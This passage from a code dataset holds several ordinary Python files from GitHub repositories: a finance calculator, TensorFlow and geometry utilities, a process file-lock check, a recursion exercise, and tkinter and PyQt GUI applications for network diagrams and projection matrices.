calculate the amount you'll have to pay on a home loan\\n\r\nEnter either \"investment\" or \"bond\" from the menu above to proceed: \"\"\"))\r\ncalculation = calculation.lower()\r\n\r\n# I have created a nested statememnt to allow the selection of \"simple\" or \"compound\" interest within the investment if statement.\r\n# I have also applied an error message below incase the user inputs anything besides \"simple\" or \"compound\".\r\nif calculation == \"investment\":\r\n amount = float(input(\"How much will you be depositing? \"))\r\n interest_rate = float(input(\"What is the interest rate? \"))\r\n interest_rate = interest_rate / 100\r\n years = float(input(\"In years, how long are you planning on investing? \"))\r\n interest_type = input(\"Would you like to opt for 'simple' or 'compound' interest? \")\r\n interest_type = interest_type.lower()\r\n if interest_type == \"simple\":\r\n simple_interest = amount * (1 + (interest_rate) * years)\r\n print(f\"The simple interest you will accumilate in addition to your investment is: £{simple_interest:.2f}\")\r\n elif interest_type == \"compound\":\r\n compound_interest = amount * math.pow((1 + interest_rate), years)\r\n print(f\"The compound interest you will accumilate in addition to your investment is: £{compound_interest:.2f}\")\r\n else:\r\n print(\"You have not entered the correct details, please enter either 'simple' or 'compound'.\")\r\n\r\n# A final error message was placed below incase all else fails as the user did not enter \"investment\" or \"bond\".\r\nelif calculation == \"bond\":\r\n house_value = float(input(\"Please enter the present value of the house: \"))\r\n interest_rate = float(input(\"What is the interest rate? \"))\r\n interest_rate = (interest_rate / 100) /12\r\n months = int(input(\"In months, how long are you planning on investing? \"))\r\n repayment = (interest_rate * house_value) / (1- (1 + interest_rate) ** (-1 * months))\r\n print(f\"The amount you will need to repay each month is: £{repayment:.2f}\")\r\nelse:\r\n print(\"You have entered the incorrect details, please enter either 'investment' or 'bond'.\")\r\n\r\n\r\n","repo_name":"H-756/Finance-Calculator","sub_path":"finance.calculators.py","file_name":"finance.calculators.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70674695258","text":"import numpy as np\nimport tensorflow as tf\n\nx = np.array([\n [\n [1, 1, 1, 3],\n [1, 2, 1, 1],\n [1, 1, 1, 3],\n [3, 2, 3, 1]\n ],\n [\n [1, 6, 7, 3],\n [1, 2, 1, 1],\n [1, 1, 1, 3],\n [3, 2, 3, 1]\n ]\n])\nx = tf.constant(x, dtype=tf.float32)\n\nlens = tf.constant([3, 3, 3, 2], dtype=tf.int64)\n\nmask = tf.constant([\n [\n [True, True, True, False],\n [True, True, True, False],\n [True, False, True, False],\n [False, False, False, False],\n ],\n [\n [True, True, True, False],\n [True, True, True, False],\n [True, False, True, False],\n [True, True, True, True],\n ]\n])\n\nidx = tf.where(mask)\nvals = tf.gather_nd(params=x, indices=idx)\nsparse = tf.SparseTensor(\n indices=idx,\n values=vals,\n dense_shape=tf.shape(x, out_type=tf.int64)\n)\n\nsm = tf.sparse_softmax(sparse)\n#dense = tf.sparse_tensor_to_dense(sm, default_value=0)\ndense = tf.scatter_nd(\n indices=sm.indices,\n updates=sm.values,\n shape=sm.dense_shape\n)\n\ngrad = tf.gradients(dense[0,1,2], [vals])[0]\n\nwith tf.train.MonitoredSession() as sess:\n print(sess.run(dense))\n print(np.sum(sess.run(dense), axis=-1))\n print(sess.run(grad))\n","repo_name":"bstriner/ctc-process","sub_path":"experiments/check_softmax.py","file_name":"check_softmax.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20302669182","text":"import sys\n\nimport numpy as np\n\nsys.path.append(\"../../utils\")\nimport polygon_utils\n\n\ndef compute_batch_polygon_distances(gt_polygons_batch, aligned_disp_polygons_batch):\n # Compute distances\n distances = np.sqrt(np.sum(np.square(aligned_disp_polygons_batch - gt_polygons_batch), axis=-1))\n\n min = np.nanmin(distances)\n mean = np.nanmean(distances)\n max = np.nanmax(distances)\n\n return min, mean, max\n\n\ndef compute_threshold_accuracies(gt_vertices_batch, pred_vertices_batch, thresholds):\n stripped_gt_polygons_list = []\n stripped_pred_polygons_list = []\n\n for gt_vertices, pred_vertices in zip(gt_vertices_batch, pred_vertices_batch):\n for gt_polygon, pred_polygon in zip(gt_vertices, pred_vertices):\n # Find first nan occurance\n nan_indices = np.where(np.isnan(gt_polygon[:, 0]))[0]\n if len(nan_indices):\n nan_index = nan_indices[0]\n if nan_index:\n gt_polygon = gt_polygon[:nan_index, :]\n pred_polygon = pred_polygon[:nan_index, :]\n else:\n # Empty polygon, break the for loop\n break\n gt_polygon = polygon_utils.strip_redundant_vertex(gt_polygon, epsilon=1e-3)\n pred_polygon = polygon_utils.strip_redundant_vertex(pred_polygon, epsilon=1e-3)\n stripped_gt_polygons_list.append(gt_polygon)\n stripped_pred_polygons_list.append(pred_polygon)\n\n if len(stripped_gt_polygons_list) == 0 or len(stripped_pred_polygons_list) == 0:\n return []\n\n stripped_gt_polygons = np.concatenate(stripped_gt_polygons_list)\n stripped_pred_polygons = np.concatenate(stripped_pred_polygons_list)\n\n distances = np.sqrt(np.sum(np.square(stripped_gt_polygons - stripped_pred_polygons), axis=-1))\n\n # Compute thresholds count\n threshold_accuracies = []\n for threshold in thresholds:\n accuracy = np.sum(distances <= threshold) / distances.size\n threshold_accuracies.append(accuracy)\n return threshold_accuracies\n\n\nif __name__ == '__main__':\n batch_size = 1\n poly_count = 3\n vertex_count = 4\n gt_vertices = np.zeros((batch_size, poly_count, vertex_count, 2))\n gt_vertices[0, 0, 0, :] = [1, 2]\n gt_vertices[0, 0, 1, :] = [3, 4]\n gt_vertices[0, 0, 2, :] = np.nan\n gt_vertices[0, 1, 0, :] = np.nan\n pred_vertices = np.zeros((batch_size, poly_count, vertex_count, 2))\n pred_vertices[0, 0, 0, :] = [1, 2]\n pred_vertices[0, 0, 1, :] = [3, 4]\n pred_vertices[0, 0, 2, :] = np.nan\n pred_vertices[0, 1, 0, :] = np.nan\n thresholds = [1, 2, 3, 4, 5, 6, 7, 8]\n\n threshold_accuracies = compute_threshold_accuracies(gt_vertices, pred_vertices, thresholds)\n print(\"threshold_accuracies = {}\".format(threshold_accuracies))\n","repo_name":"Lydorn/mapalignment","sub_path":"projects/mapalign/evaluate_funcs/evaluate_utils.py","file_name":"evaluate_utils.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"68"} +{"seq_id":"71263860378","text":"#coding: utf-8\nfrom __future__ import unicode_literals, absolute_import\n\nimport os\nimport psutil\n\n\ndef get_pids_by_name(name):\n for p in psutil.process_iter():\n if name in p.name():\n yield p\n\n\ndef dir_locked_by_process(dir, process):\n try:\n for f in process.open_files():\n if f.path.startswith(dir):\n return True\n except psutil.AccessDenied:\n pass\n return False\n\n\ndef is_locked(root_dir, src_dir, process_name):\n if root_dir == src_dir:\n return False\n\n src_dir = os.path.realpath(src_dir)\n\n for process in get_pids_by_name(process_name):\n if dir_locked_by_process(src_dir, process):\n return True\n\n src_dir = os.sep.join(src_dir.split(os.sep)[:-1])\n if root_dir != src_dir:\n return is_locked(root_dir=root_dir, src_dir=src_dir, process_name=process_name)\n\n return False\n","repo_name":"Yuego/d3-convert","sub_path":"d3_convert/utils/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74524233817","text":"# Урок 5. Рекурсия и алгоритмы\n# Задача 26: Напишите программу, которая на вход принимает два числа A и B, и возводит число А в целую степень B с помощью рекурсии.\n# *Пример:*\n# A = 3; B = 5 -> 243 (3⁵)\n# A = 2; B = 3 -> 8 \n\ndef recr ( B , A ):\n if B == 0:\n return 1\n return A*recr ( B-1, A)\nA = int (input (\"Введите число\"))\nB = int (input (\"В какую степень возвести\"))\nprint (recr (B,A))","repo_name":"Tyapor718/PHome5","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35246302367","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk, ImageDraw\r\nimport numpy as np\r\n\r\n\"\"\"\r\nVoici mon logiciel de dessin style packet tracer\r\nJ'ai recuperer une partie de code sur internet pour le menu bar et le canva (50 lignes environ) et j'ai fait tout le reste\r\nJ'y ai passer beaucoup de temps et je sais que je me suis beaucoup compliquer la vie mais je n'ai pas trouvé d'autre solution pour faire ce que je voulais\r\nJe suis preneur de toute critique \r\n\"\"\"\r\n\r\n# creation d’une fenêtre\r\nfen1=Tk()\r\nfen1.title('packHESS tracer')\r\ncompteur_routeur = StringVar()\r\ncompteur_routeur.set(0)\r\n\r\ncompteur_switch = StringVar()\r\ncompteur_switch.set(0)\r\n\r\ncompteur_client = StringVar()\r\ncompteur_client.set(0)\r\n\r\ncompteur_client_mobile = StringVar()\r\ncompteur_client_mobile.set(0)\r\n\r\ndef tabeffacer(): \r\n tableau.delete(ALL) # ça effacera tout ce qu'il y a dans le tableau \r\n\r\n# creation de la barre de menu\r\nmenuDraweasy = Menu(fen1) #\r\ndef info(): # affiche les coordonnées du clic gauche\r\n fenetre_prop = Toplevel()\r\n fenetre_prop.title(\"Mode D'emploi\")\r\n fenetre_prop.geometry(\"600x100\")\r\n fenetre_prop.resizable(width=False, height=False)\r\n # zone de texte\r\n zone_texte = Text(fenetre_prop, width=150, height=20)\r\n zone_texte.pack()\r\n zone_texte.insert(END, \"Bienvenue dans le mode d'emploi de l'application PackHess Tracer\\n\")\r\n zone_texte.insert(END, \"Le clic gauche sert a sélectionner et placer les items\\n\")\r\n zone_texte.insert(END, \"La ligne est tracée entre le point de clic et celui de déclic.\\n\")\r\n zone_texte.insert(END, \"La molette sert a déplacer les items et les namestags\\n\")\r\n zone_texte.insert(END, \"Le clic droit sert a affciher les propriétés\\n\")\r\n fenetre_prop.configure(bg='white')\r\n\r\ninfo()\r\n\r\n################# creation des icones #################\r\ndef img_routeur():\r\n image = Image.open(\"routeur.png\")\r\n image = image.resize((50, 50))\r\n image_routeur = ImageTk.PhotoImage(image)\r\n return image_routeur\r\nimage_routeur = img_routeur()\r\n\r\ndef img_line():\r\n image = Image.open(\"line.png\")\r\n image = image.resize((50, 50))\r\n image_line = ImageTk.PhotoImage(image)\r\n return image_line\r\nimage_line = img_line()\r\n\r\ndef img_switch():\r\n image = Image.open(\"switch.jpg\")\r\n image = image.resize((50, 50))\r\n image_switch = ImageTk.PhotoImage(image)\r\n return image_switch\r\nimage_switch = img_switch()\r\n\r\ndef image_cli_pc():\r\n image = Image.open(\"pc.png\")\r\n image = image.resize((50, 50))\r\n image_client_pc = ImageTk.PhotoImage(image)\r\n return image_client_pc\r\nimage_client_pc = image_cli_pc()\r\n\r\ndef image_suppr():\r\n image = Image.open(\"1214428.png\")\r\n image = image.resize((50, 50))\r\n image_supp = ImageTk.PhotoImage(image)\r\n return image_supp\r\nimage_supp = image_suppr()\r\n\r\ndef image_client_mobile():\r\n image = Image.open(\"mobile.png\")\r\n image = image.resize((50, 50))\r\n image_mobile = ImageTk.PhotoImage(image)\r\n return image_mobile\r\nimage_mobile = image_client_mobile()\r\n####################################################### A partir d'ici c'est recuperer sur internet puis adapter a mon besoin ############################################################\r\n# Jy comprennais strictement rien et ca m'a pas mal aider sauf les boutons fait dans dans des boucles ca m'a pas mal compliquer la vie \r\n#####################################################################\r\n#pris sur internet\r\n# creation du menu fichier\r\nfichier = Menu(menuDraweasy)\r\nmenuDraweasy.add_cascade(label=\"Fichier\",menu=fichier) # on crée une barre de menu\r\nfichier.add_command(label=\"Quitter\", command=fen1.destroy) # on ajoute une option au menu\r\n# creation du menu effacer\r\neffacer = Menu(menuDraweasy)\r\nmenuDraweasy.add_cascade(label=\"Effacer\",menu=effacer)\r\neffacer.add_command(label=\"Effacer tout\", command=lambda : tabeffacer()) \r\n# afficher le menu\r\nfen1.config(menu=menuDraweasy)\r\n# creation des differents cadres\r\nTableau=LabelFrame(fen1)\r\nTableau.configure(text='',bd=2,relief='flat')\r\nTableau.grid(row=0,rowspan=3,column=2,padx=0,pady=0)\r\nCouleur=LabelFrame(fen1)\r\nCouleur.configure(text='Couleur du trait',font='Courier 10',bd=2,relief='flat')\r\nCouleur.grid(row=0,column=1,padx=0,pady=0,sticky=W)\r\nStyle=LabelFrame(fen1)\r\nStyle.configure(text='Style de forme',font='Courier 10',bd=2,relief='flat')\r\nStyle.grid(row=1,column=1,padx=0,pady=0,sticky=W)\r\nEpaisseur=LabelFrame(fen1)\r\nEpaisseur.configure(text='Epaisseur du trait',font='Courier 10',bd=2,relief='flat')\r\nEpaisseur.grid(row=2,column=1,padx=0,pady=0,sticky=W)\r\n# creation des boutons du cadre Tableau\r\ntableau=Canvas(Tableau)\r\ntableau.focus_set()\r\ntableau.configure(width=800,height=700,bg='white')\r\ntableau.grid()\r\n#creation variable item selectionner\r\nstyle=StringVar()\r\nstyle.set(0) # 0 = routeur, 1 = switch, 2 = client, 3 = ligne, 4 = suppr\r\n# adaptation du code trouvé sur internet\r\n# j'ai eu la flemme de changer les variables au debut mais mtn elles sont partout ca va etre trop long de toutes les changer...\r\n# creation des boutons de choix d'item\r\ncouleur=IntVar()\r\ncouleur.set(0)\r\npalette=[image_routeur,image_switch,image_client_pc,image_mobile , image_line, image_supp]\r\nobjet=['routeur', 'switch', 'client pc','client mobile', 'ligne', 'gomme' ]\r\nrcouleur={}\r\n#######################################################\r\n # creation des boutons du cadre Epaisseur\r\nepaisseur=IntVar() \r\nepaisseur.set(1)\r\nrepaisseur={}\r\nfor e in range(1,5):\r\n repaisseur[e]=Radiobutton(Epaisseur)\r\n repaisseur[e].configure(variable=epaisseur,value=e,text=str(e),indicatoron=1)\r\n repaisseur[e].grid(sticky=N, padx=5)\r\n#######################################################\r\n####################################################### A partir d'ici c'est de nouevau a moi ############################################################\r\netatboutonsouris='haut'# etat du bouton gauche de la souris au début\r\n#######################################################\r\ndef declic_suppr(event): # supprime l'item selectionner\r\n global etatboutonsouris,X2,Y2\r\n etatboutonsouris='haut'\r\n X2=event.x\r\n Y2=event.y\r\n item = tableau.find_closest(X2,Y2)\r\n tableau.delete(item)\r\n print(\"done\")\r\n#######################################################\r\n palette=[image_routeur,image_switch,image_client_pc,image_mobile , image_line, image_supp]\r\n#######################################################\r\ndef choix_style_menubar(): # selon l'item selectionner, on bind la fonction associée\r\n if tableau.find_closest(X1, Y1) != (): # si on ne clique pas sur rien\r\n if tableau.find_closest(X1, Y1) == (rcouleur[0]):\r\n style.set(0)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[1]):\r\n style.set(1)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[2]):\r\n style.set(2)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[3]):\r\n style.set(3)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[4]):\r\n style.set(4)\r\n tableau.bind('',declic)\r\n elif tableau.find_closest(X1, Y1) == (rcouleur[5]):\r\n style.set(5)\r\n print('its me')\r\n tableau.bind('',declic_suppr)\r\n else: # si jamais on clique sur rien\r\n tableau.bind('',declic)\r\n ligne_selected = ['true','first clic done']\r\n#######################################################\r\n#######################################################\r\ndef clic_en_fonction_de_style(): # si autre que suppr, lacher clic gauche = declic, sinon clic gauche = declic_suppr\r\n if str(style.get()) == '0':\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '1':\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '2':\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '3': \r\n tableau.bind('',declic)\r\n elif str(style.get() )== '4': # si suppr\r\n tableau.bind('',declic)\r\n elif str(style.get()) == '5':\r\n tableau.bind('',declic_suppr)\r\n else: \r\n print(f\"erreur style.get() = {style.get()}\")\r\n#######################################################\r\n####################################################### # evenement associe au clic sur le tableau\r\ndef clic(event): # creation d'un objet \"event\" lorsque l'on appuie sur le tableau\r\n global etatboutonsouris,X1,Y1, ligne_selected # X1 et Y1 sont les attributs qui contiennent les coordonnées au moment du clic\r\n if str(style.get()) == \"3\":\r\n ligne_selected = 'true'\r\n etatboutonsouris='bas' \r\n X1=event.x\r\n Y1=event.y\r\n choix_style_menubar() # si jamais clic sur un item du menu\r\n clic_en_fonction_de_style()\r\n#######################################################\r\n#### creation des boutons de choix d'item\r\nfor c in range(0,6):\r\n rcouleur[c]=Radiobutton(Couleur)\r\n rcouleur[c].config(image=palette[c])\r\n rcouleur[c].configure(variable=style,value=str(c),padx=8,indicatoron=1, width=50, height=50, command=lambda : print(f\"style.get : {style.get()} et item : {objet[int(style.get())]}\"))\r\n rcouleur[c].grid(sticky=W, padx=5)\r\nstyle.set(0) # valeur par defaut car sinon selectionne tout\r\n# move image with mouse \r\ndef clicM(event): #lors du clic sur la molette on recupere les coordonées\r\n global etatboutonsouris,XM,YM\r\n etatboutonsouris='bas'\r\n XM=event.x\r\n YM=event.y\r\n\r\ndef releaseM(event): # lors du relachement de la molette on recupere les coordonées\r\n global etatboutonsouris,XMR,YMR\r\n XMR=event.x\r\n YMR=event.y\r\n etatboutonsouris='haut'\r\n if etatboutonsouris =='haut': # ici on déplace l'objet au coordonées du relachement de la molette\r\n item = tableau.find_closest(XM,YM)\r\n tableau.move(item,XMR-XM,YMR-YM)\r\n \r\ntableau.bind('',releaseM) # on associe le relachement de la molette à la fonction releaseM\r\ntableau.bind('', clicM) # on associe le clic de la molette à la fonction clicM\r\n\r\ndef declic(event):# evenements associe au declic sur le tableau\r\n global etatboutonsouris,X2,Y2\r\n etatboutonsouris='haut'\r\n X2=event.x\r\n Y2=event.y\r\n # declic basique si un choix a etait fait dans le menu\r\n if (style.get()==\"0\"): # si a choisi routeur\r\n icon = tableau.create_image(X1,Y1,anchor=NW,image=image_routeur, tags=('routeur'+str(compteur_routeur.get())))\r\n tableau.create_text(X1+24,Y1+60, text=tableau.gettags(icon), tags='texte')\r\n c = int(compteur_routeur.get()); c = c+1; compteur_routeur.set(c)\r\n elif (style.get()==\"1\"): # si a choisi switch\r\n icon1 = tableau.create_image(X1,Y1,anchor=NW,image=image_switch, tags=('switch'+str(compteur_switch.get())))\r\n tableau.create_text(X1+20,Y1+20, text=tableau.gettags(icon1), tags='texte')\r\n c = int(compteur_switch.get()); c = c+1; compteur_switch.set(c)\r\n elif (style.get()==\"2\"): # si a choisi pc\r\n icon2 = tableau.create_image(X1,Y1,anchor=NW,image=image_client_pc, tags=('client'+str(compteur_client.get())))\r\n tableau.create_text(X1+20,Y1+20, text=tableau.gettags(icon2), tags='texte')\r\n c = int(compteur_client.get()); c = c+1; compteur_client.set(c)\r\n elif (style.get()==\"3\"): # si a choisi mobile\r\n icon3 = tableau.create_image(X1,Y1,anchor=NW,image=image_mobile, tags=('mobile'+str(compteur_client_mobile.get())))\r\n tableau.create_text(X1+20,Y1+20, text=tableau.gettags(icon3), tags='texte')\r\n c = int(compteur_client_mobile.get()); c = c+1; compteur_client_mobile.set(c)\r\n elif (style.get() == \"4\"): # si a choisi ligne\r\n tableau.create_line(X1,Y1,X2,Y2,fill='black',width=epaisseur.get(), tags=('ligne'))\r\ntableau.bind('',clic) # clic gauche = clic\r\n\r\n################## partie modification et infos ############################\r\n'''\r\ndef test():\r\n items_nom.append(str(string_nom.get()))\r\n items_ip.append(str(string_ip.get()))\r\n items_mac.append(str(string_mac.get()))\r\n items_mdp.append(str(string_mdp.get()))\r\n \r\n print(f\"nom : {items_nom} ip : {items_ip} mac : {items_mac} mdp : {items_mdp}\")\r\n'''\r\n\r\nglobal items_nom\r\nitems_nom = {}\r\n#\r\nglobal string_nom\r\nstring_nom = StringVar()\r\n\r\nglobal items_ip\r\nitems_ip = {}\r\n#\r\nglobal string_ip\r\nstring_ip = StringVar()\r\n# \r\nglobal items_mac\r\nitems_mac = {}\r\n#\r\nglobal string_mac\r\nstring_mac = StringVar()\r\n#\r\nglobal items_mdp\r\nitems_mdp = {}\r\n#\r\nglobal string_mdp\r\nstring_mdp = StringVar()\r\n\r\ndef adding_to_dict():\r\n item = tableau.find_closest(localX, localY)\r\n name = tableau.gettags(item)[0] + str(item)[1:2]\r\n items_nom[name] = str(name)\r\n items_nom[name] = str(string_ip.get())\r\n items_nom[name] = str(string_mac.get())\r\n items_nom[name] = str(string_mdp.get())\r\n print(f\"dico : items_nom : {items_nom}\")\r\n print(f\"nom : {items_nom} ip : {items_ip} mac : {items_mac} mdp : {items_mdp}\")\r\n \r\ndef window_propriété(event):\r\n# fenetre de propriété\r\n fenetre_prop = Toplevel()\r\n fenetre_prop.title(\"Propriétés propriétés\")\r\n fenetre_prop.geometry(\"400x400\")\r\n fenetre_prop.resizable(width=False, height=False)\r\n fenetre_prop.configure(bg='white')\r\n# formulaire texte\r\n # champs entree texte\r\n item = tableau.find_closest(event.x, event.y)\r\n name = tableau.gettags(item)[0] + str(item)[1:2]\r\n #for i in range(tableau.find_all())\r\n label_nom = Label(fenetre_prop, text='nom').pack()\r\n entry_nom = Entry(fenetre_prop, textvariable=string_nom).pack()\r\n # champs entree texte\r\n label_ip = Label(fenetre_prop, text='ip').pack()\r\n entry_ip = Entry(fenetre_prop, textvariable=string_ip).pack()\r\n # champs entree texte\r\n label_mac = Label(fenetre_prop, text='mac').pack()\r\n entry_mac = Entry(fenetre_prop, textvariable=string_mac).pack()\r\n # champs entree texte\r\n label_mdp = Label(fenetre_prop, text='mdp').pack()\r\n entry_mdp = Entry(fenetre_prop, textvariable=string_mdp).pack()\r\n # Bouton valider\r\n bouton_valider = Button(fenetre_prop, text='Valider', command=adding_to_dict).pack()\r\n fenetre_prop.mainloop()\r\n return fenetre_prop\r\n\r\ndef proprietes(event):\r\n global localX\r\n localX = event.x\r\n global localY\r\n localY = event.y\r\n ### create a new small window when clicking on the image\r\n if tableau.find_closest(event.x, event.y, halo=1) != ():\r\n item = tableau.find_closest(event.x, event.y)\r\n name = tableau.gettags(item)[0] + str(item)[1:2]\r\n print(name)\r\n print('item = ', item)\r\n fenetre_prop = window_propriété(event)\r\n tableau.bind('',window_propriété)\r\n #fenetre_prop.grab_set()\r\n fenetre_prop.focus_set()\r\n fenetre_prop.wait_window()\r\n fenetre_prop.mainloop()\r\ntableau.bind('',proprietes) # clic droit = proprietes\r\n# attente des evenements\r\nfen1.mainloop() # démarre l'observateur d'évènements\r\n\r\n\r\n\r\n\r\n","repo_name":"IUT-Beziers/r309-tp2-PaulBerra","sub_path":"test3r.py","file_name":"test3r.py","file_ext":"py","file_size_in_byte":15417,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40327760911","text":"import sys\n\nsys.path.append(\"..\")\nfrom Math import projection\nfrom ProjectionMatrix.vtk_window_pm import vtk_window_pm\nimport numpy as np\nfrom ProjectionMatrix.vtk_proj_matrix import vtk_proj_matrix\nfrom PyQt5 import QtWidgets\n\nfrom ProjectionMatrix.ProjMatCreator import Ui_projectionMatrixCreator\n\n\nclass ProjMatCreator_logic(Ui_projectionMatrixCreator):\n def __init__(self, widget):\n Ui_projectionMatrixCreator.__init__(self)\n ##set up the UI\n self.setupUi(widget)\n self.init_variables()\n self.connect_sliders()\n self.connect_textfields()\n self.connect_buttons()\n self.vtk_handle = vtk_window_pm()\n self.vtk_handle.vtkWidget(self.View3D)\n self.create_tajectory()\n\n def connect_buttons(self):\n self.bt_reset.clicked.connect(self.on_reset_all_values)\n\n def init_variables(self):\n self.initial_values = [200, 0, 100, 1200, 750, 1240, 960, 0.305, 0.305, 8, 0, 0, 1]\n self.current_values = self.initial_values.copy()\n self.pm_actor_list = []\n self.pm = []\n self.last_density = self.current_values[9]\n\n def on_update_matrices(self):\n self.pm_actor_list = []\n self.pm = []\n\n start = self.current_values[1]\n stop = self.current_values[2]\n num_proj = max(self.current_values[0], 1)\n delta_ang = (stop - start) / num_proj\n axis = np.matrix([self.current_values[-3], self.current_values[-2], self.current_values[-1]])\n\n offset_u = self.current_values[5] / 2\n offset_v = self.current_values[6] / 2\n\n sid = self.current_values[3]\n sisod = self.current_values[4]\n px_sp = self.current_values[7]\n default_pm = projection.create_default_projection_matrix(pixel_spacing=px_sp,\n sid=sid, sisod=sisod, offset_u=offset_u,\n offset_v=offset_v)\n\n for i in range(int(self.current_values[0])):\n rot = projection.get_rotation_matrix_by_axis_and_angle(axis.T, start + delta_ang * i,\n make_matrix_homogen=True)\n pm = default_pm * rot\n self.pm.append(pm)\n self.pm_actor_list.append(vtk_proj_matrix(pm, sid, offset_u * 2, offset_v * 2))\n\n def connect_sliders(self):\n ##connect sliders\n self.sl_num_proj.valueChanged.connect(lambda x: self.tf_num_proj.setText(str(x)))\n self.sl_proj_sparsity.valueChanged.connect(lambda x: self.tf_proj_sparsity.setText(str(x)))\n self.sl_start_angle.valueChanged.connect(lambda x: self.tf_start_angle.setText(str(x)))\n self.sl_stop_angle.valueChanged.connect(lambda x: self.tf_stop_angle.setText(str(x)))\n self.sl_SID.valueChanged.connect(lambda x: self.tf_SID.setText(str(x)))\n self.sl_SISOD.valueChanged.connect(lambda x: self.tf_SISOD.setText(str(x)))\n self.sl_size_U.valueChanged.connect(lambda x: self.tf_size_U.setText(str(x)))\n self.sl_size_V.valueChanged.connect(lambda x: self.tf_size_V.setText(str(x)))\n\n def connect_textfields(self):\n self.tf_num_proj.textChanged.connect(lambda x: self.on_proj_para_changed(x, 0))\n self.tf_proj_sparsity.textChanged.connect(lambda x: self.on_proj_para_changed(x, 9))\n self.tf_start_angle.textChanged.connect(lambda x: self.on_proj_para_changed(x, 1))\n self.tf_stop_angle.textChanged.connect(lambda x: self.on_proj_para_changed(x, 2))\n self.tf_SID.textChanged.connect(lambda x: self.on_proj_para_changed(x, 3))\n self.tf_SISOD.textChanged.connect(lambda x: self.on_proj_para_changed(x, 4))\n self.tf_size_U.textChanged.connect(lambda x: self.on_proj_para_changed(x, 5))\n self.tf_size_V.textChanged.connect(lambda x: self.on_proj_para_changed(x, 6))\n self.tf_px_U.textChanged.connect(lambda x: self.on_proj_para_changed(x, 7))\n self.tf_px_V.textChanged.connect(lambda x: self.on_proj_para_changed(x, 8))\n\n ###sync textbox with sliders\n self.tf_num_proj.textChanged.connect(lambda x: self.sl_num_proj.setSliderPosition(int(x)))\n self.tf_proj_sparsity.textChanged.connect(lambda x: self.sl_proj_sparsity.setSliderPosition(int(x)))\n self.tf_start_angle.textChanged.connect(lambda x: self.sl_start_angle.setSliderPosition(int(x)))\n self.tf_stop_angle.textChanged.connect(lambda x: self.sl_stop_angle.setSliderPosition(int(x)))\n self.tf_SID.textChanged.connect(lambda x: self.sl_SID.setSliderPosition(int(x)))\n self.tf_SISOD.textChanged.connect(lambda x: self.sl_SISOD.setSliderPosition(int(x)))\n self.tf_size_U.textChanged.connect(lambda x: self.sl_size_U.setSliderPosition(int(x)))\n self.tf_size_V.textChanged.connect(lambda x: self.sl_size_V.setSliderPosition(int(x)))\n\n def disable_slider_connections(self, boolean):\n self.sl_num_proj.blockSignals(boolean)\n self.sl_start_angle.blockSignals(boolean)\n self.sl_stop_angle.blockSignals(boolean)\n self.sl_SID.blockSignals(boolean)\n self.sl_SISOD.blockSignals(boolean)\n self.sl_size_U.blockSignals(boolean)\n self.sl_size_V.blockSignals(boolean)\n\n def on_proj_para_changed(self, value, identifier):\n cur_para = self.current_values\n create_trajectory = self.create_tajectory\n cur_para[identifier] = float(value)\n create_trajectory()\n\n def on_set_projection_values(self, value, identifier):\n if identifier == 0:\n self.tf_num_proj.setText(str(value))\n self.sl_num_proj.setSliderPosition(int(value))\n elif identifier == 1:\n self.tf_start_angle.setText(str(value))\n self.sl_start_angle.setSliderPosition(int(value))\n elif identifier == 2:\n self.tf_stop_angle.setText(str(value))\n self.sl_stop_angle.setSliderPosition(int(value))\n elif identifier == 3:\n self.tf_SID.setText(str(value))\n self.sl_SID.setSliderPosition(int(value))\n elif identifier == 4:\n self.tf_SISOD.setText(str(value))\n self.sl_SISOD.setSliderPosition(int(value))\n elif identifier == 5:\n self.tf_size_U.setText(str(value))\n self.sl_size_U.setSliderPosition(int(value))\n elif identifier == 6:\n self.tf_size_V.setText(str(value))\n self.sl_size_V.setSliderPosition(int(value))\n elif identifier == 7:\n self.tf_px_U.setText(str(value))\n elif identifier == 8:\n self.tf_px_V.setText(str(value))\n\n def create_tajectory(self):\n if len(self.pm_actor_list) > 1:\n tmp_list = self.pm_actor_list[::int(self.last_density)]\n for act in self.pm_actor_list:\n self.vtk_handle.remove_actor(act)\n self.on_update_matrices()\n self.last_density = self.current_values[9]\n tmp_list = self.pm_actor_list[::int(self.last_density)]\n for actor in tmp_list:\n self.vtk_handle.add_actors(actor)\n self.vtk_handle.update()\n\n def on_reset_all_values(self):\n for i in range(len(self.initial_values)):\n self.on_set_projection_values(self.initial_values[i], i)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QDialog()\n prog = ProjMatCreator_logic(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())","repo_name":"alPreuhs/MotionCreator","sub_path":"ProjectionMatrix/ProjMatCreator_logic.py","file_name":"ProjMatCreator_logic.py","file_ext":"py","file_size_in_byte":7573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72458453975","text":"# conda activate py36_network_medicine && \\\n# cd /mnt/external_disk/mycodehtml/bio_health/Network_medicine/barabasilab.com_course/Networks_and_Computers/Code/Student_version && \\\n# rm e.l && python networks_and_computers_handson1.py \\\n# 2>&1 | tee -a e.l && code e.l\n\n# ================================================================================\nimport 